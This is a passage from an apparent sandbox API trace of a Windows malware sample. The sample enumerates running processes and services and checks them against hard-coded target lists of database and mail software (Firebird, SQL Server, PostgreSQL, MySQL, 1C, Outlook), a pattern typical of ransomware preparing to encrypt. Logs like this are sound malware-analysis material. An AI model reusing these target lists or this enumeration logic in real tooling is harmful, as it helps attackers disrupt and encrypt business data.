th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0261.717] lstrlenW (lpString="userinit.exe") returned 12 [0261.717] Process32NextW (in: hSnapshot=0x3e0, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x340, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0261.717] lstrlenW (lpString="dwm.exe") returned 7 [0261.717] Process32NextW (in: hSnapshot=0x3e0, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x448, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0261.717] lstrlenW (lpString="explorer.exe") returned 12 [0261.717] Process32NextW (in: hSnapshot=0x3e0, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0261.718] lstrlenW (lpString="spoolsv.exe") returned 11 [0261.718] Process32NextW (in: hSnapshot=0x3e0, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0261.718] lstrlenW (lpString="taskhost.exe") returned 12 [0261.718] Process32NextW (in: hSnapshot=0x3e0, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0261.718] lstrlenW (lpString="svchost.exe") returned 11 [0261.718] Process32NextW (in: hSnapshot=0x3e0, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="MicosoftSearch.exe")) returned 1 [0261.718] lstrlenW (lpString="MicosoftSearch.exe") returned 18 [0261.718] Process32NextW (in: hSnapshot=0x3e0, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x54c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0261.719] lstrlenW (lpString="reader_sl.exe") returned 13 [0261.719] Process32NextW (in: hSnapshot=0x3e0, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x54c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 0 [0261.719] CloseHandle (hObject=0x3e0) returned 1 [0261.719] Sleep (dwMilliseconds=0x1f4) [0262.523] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x47ea2b8 [0262.906] EnumServicesStatusExW (in: hSCManager=0x47ea2b8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0) returned 0 [0262.906] GetLastError () returned 0xea [0262.906] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xd68) returned 0x3dec5a0 [0262.906] EnumServicesStatusExW (in: hSCManager=0x47ea2b8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x3dec5a0, cbBufSize=0xd68, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x3dec5a0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0) returned 1 [0262.907] CloseServiceHandle (hSCObject=0x47ea2b8) returned 1 [0262.907] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0262.907] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0262.907] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0262.907] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0262.907] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0262.907] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0262.907] lstrlenW (lpString="AudioSrv") returned 8 [0262.907] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0262.907] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0262.907] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0262.907] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0262.907] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0262.907] lstrlenW (lpString="BFE") returned 3 [0262.907] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0262.907] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0262.907] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0262.907] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0262.908] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0262.908] lstrlenW (lpString="CryptSvc") returned 8 [0262.908] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0262.908] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0262.908] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0262.908] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0262.908] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0262.908] lstrlenW (lpString="CscService") returned 10 [0262.908] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0262.908] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0262.908] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0262.908] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0262.908] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0262.908] lstrlenW (lpString="DcomLaunch") returned 10 [0262.908] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0262.908] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0262.908] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0262.908] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0262.908] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0262.908] lstrlenW (lpString="Dhcp") returned 4 [0262.908] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0262.908] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0262.908] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0262.908] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0262.908] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0262.908] lstrlenW (lpString="Dnscache") returned 8 [0262.908] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0262.908] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0262.908] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0262.908] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0262.908] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0262.908] lstrlenW (lpString="DPS") returned 3 [0262.908] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0262.909] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0262.909] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0262.909] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0262.909] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0262.909] lstrlenW (lpString="eventlog") returned 8 [0262.909] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0262.909] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0262.909] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0262.909] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0262.909] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0262.909] lstrlenW (lpString="EventSystem") returned 11 [0262.909] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0262.909] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0262.909] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0262.909] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0262.909] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0262.909] lstrlenW (lpString="gpsvc") returned 5 [0262.909] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0262.909] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0262.909] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0262.909] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0262.909] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0262.909] lstrlenW (lpString="LanmanWorkstation") returned 17 [0262.909] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0262.909] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0262.909] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0262.909] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0262.909] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0262.909] lstrlenW (lpString="lmhosts") returned 7 [0262.909] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0262.909] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0262.909] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0262.909] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0262.910] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0262.910] lstrlenW (lpString="MMCSS") returned 5 [0262.910] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0262.910] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0262.910] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0262.910] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0262.910] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0262.910] lstrlenW (lpString="MpsSvc") returned 6 [0262.910] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0262.910] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0262.910] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0262.910] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0262.910] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0262.910] lstrlenW (lpString="NlaSvc") returned 6 [0262.910] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0262.910] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0262.910] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0262.910] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0262.910] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0262.910] lstrlenW (lpString="nsi") returned 3 [0262.910] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0262.910] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0262.910] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0262.910] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0262.910] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0262.910] lstrlenW (lpString="PcaSvc") returned 6 [0262.910] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0262.910] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0262.910] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0262.910] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0262.910] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0262.910] lstrlenW (lpString="PlugPlay") returned 8 [0262.910] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0262.911] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0262.911] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0262.911] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0262.911] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0262.911] lstrlenW (lpString="Power") returned 5 [0262.911] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0262.911] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0262.911] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0262.911] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0262.911] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0262.911] lstrlenW (lpString="ProfSvc") returned 7 [0262.911] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0262.911] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0262.911] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0262.911] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0262.911] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0262.911] lstrlenW (lpString="RpcEptMapper") returned 12 [0262.911] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0262.911] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0262.911] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0262.911] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0262.911] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0262.911] lstrlenW (lpString="RpcSs") returned 5 [0262.911] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0262.911] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0262.911] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0262.911] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0262.911] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0262.911] lstrlenW (lpString="SamSs") returned 5 [0262.911] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0262.911] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0262.911] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0262.911] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0262.912] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0262.912] lstrlenW (lpString="Schedule") returned 8 [0262.912] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0262.912] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0262.912] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0262.912] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0262.912] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0262.912] lstrlenW (lpString="SENS") returned 4 [0262.912] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0262.912] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0262.912] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0262.912] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0262.912] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0262.912] lstrlenW (lpString="ShellHWDetection") returned 16 [0262.912] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0262.912] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0262.912] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0262.912] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0262.912] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0262.912] lstrlenW (lpString="Spooler") returned 7 [0262.912] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0262.912] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0262.912] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0262.912] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0262.912] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0262.912] lstrlenW (lpString="SysMain") returned 7 [0262.912] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0262.912] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0262.912] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0262.912] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0262.912] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0262.912] lstrlenW (lpString="Themes") returned 6 [0262.912] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0262.913] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0262.913] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0262.913] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0262.913] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0262.913] lstrlenW (lpString="TrkWks") returned 6 [0262.913] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0262.913] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0262.913] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0262.913] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0262.913] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0262.913] lstrlenW (lpString="UxSms") returned 5 [0262.913] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0262.913] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0262.913] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0262.913] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0262.913] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0262.913] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0x3dec5a0 | out: hHeap=0xb00000) returned 1 [0262.913] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x3bc [0262.914] Process32FirstW (in: hSnapshot=0x3bc, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0262.915] Process32NextW (in: hSnapshot=0x3bc, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0262.915] lstrlenW (lpString="System") returned 6 [0262.915] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0262.915] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0262.915] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0262.915] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0262.915] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0262.915] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0262.915] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0262.915] Process32NextW (in: hSnapshot=0x3bc, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0262.915] lstrlenW (lpString="smss.exe") returned 8 [0262.915] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0262.915] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0262.915] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0262.915] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0262.915] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0262.915] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0262.916] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0262.916] Process32NextW (in: hSnapshot=0x3bc, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0262.916] lstrlenW (lpString="csrss.exe") returned 9 [0262.916] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0262.916] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0262.916] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0262.916] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0262.916] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0262.916] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0262.916] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0262.916] Process32NextW (in: hSnapshot=0x3bc, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0262.916] lstrlenW (lpString="wininit.exe") returned 11 [0262.916] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0262.916] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0262.916] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0262.916] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0262.916] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0262.916] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0262.916] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0262.916] Process32NextW (in: hSnapshot=0x3bc, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x18c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x178, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0262.917] lstrlenW (lpString="csrss.exe") returned 9 [0262.917] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0262.917] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0262.917] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0262.917] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0262.917] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0262.917] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0262.917] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0262.917] Process32NextW (in: hSnapshot=0x3bc, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0262.917] lstrlenW (lpString="winlogon.exe") returned 12 [0262.917] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1 [0262.917] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1 [0262.917] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1 [0262.917] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1 [0262.917] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1 [0262.917] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1 [0262.917] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1 [0262.917] Process32NextW (in: hSnapshot=0x3bc, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x180, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0262.918] lstrlenW (lpString="services.exe") returned 12 [0262.918] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1 [0262.918] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1 [0262.918] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1 [0262.918] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1 [0262.918] lstrcmpiW 